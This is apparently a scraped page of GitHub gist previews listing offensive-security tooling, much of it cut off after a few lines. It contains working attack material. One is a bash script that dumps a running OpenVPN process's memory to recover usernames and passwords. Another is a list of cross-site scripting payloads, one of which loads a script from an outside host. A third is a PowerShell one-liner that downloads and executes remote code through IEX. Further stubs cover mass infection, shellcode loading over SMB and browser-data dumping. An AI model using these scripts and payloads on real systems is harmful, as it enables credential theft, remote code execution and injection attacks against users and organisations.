This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-MassInfect | |
{ | |
<# | |
Inspired by Chris Campbell's WMIS command encoder | |
https://github.com/obscuresec/random/blob/master/EncodeShell.py | |
CIDR Parser from Matt Graeber's Invoke-PortScanhttps://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1 | |
https://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1 | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-SMBWmi { | |
[CmdletBinding()] | |
param( | |
[String[]] | |
$ComputerName = ".", | |
[String] | |
$Pipename = "tf12lol" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# This little hack-job will grab credentials from a running openvpn process in Linux | |
# Keep in mind this won't work if the user used the --auth-nocache flag | |
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}') | |
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done | |
echo "Your credentials should be listed below as username/password" | |
strings *.dump | awk 'NR>=3 && NR<=4 { print }' | |
rm *.dump --force |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell.exe -nop -c "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.downloadstring('$URL'))" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-RecentDocs { | |
<# | |
.SYNOPSIS | |
Pulls names of recently opened documents from registry | |
Author: Matthew Graeber (@mattifestation) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
.DESCRIPTION |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-BrowserInformation { | |
<# | |
.SYNOPSIS | |
Dumps Browser Information | |
Author: @424f424f | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
.DESCRIPTION | |
Enumerates browser history or bookmarks |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import binascii | |
import sys | |
file_name = sys.argv[1] | |
with open (file_name) as f: | |
hexdata = binascii.hexlify(f.read()) | |
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2])) | |
shellcode = '' | |
for i in hexlist: | |
shellcode += "0x{},".format(i) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-SMBShellcodeLoad { | |
<# | |
.SYNOPSIS | |
Short description | |
.DESCRIPTION | |
Long description | |
.EXAMPLE | |
An example |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# | |
# Title: lookupadmins.py | |
# Author: @ropnop | |
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR | |
# Similar in function to Get-NetLocalGroup from Powerview | |
# Won't work against Windows 10 Anniversary Edition unless you already have local admin | |
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016 | |
# | |
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket |
OlderNewer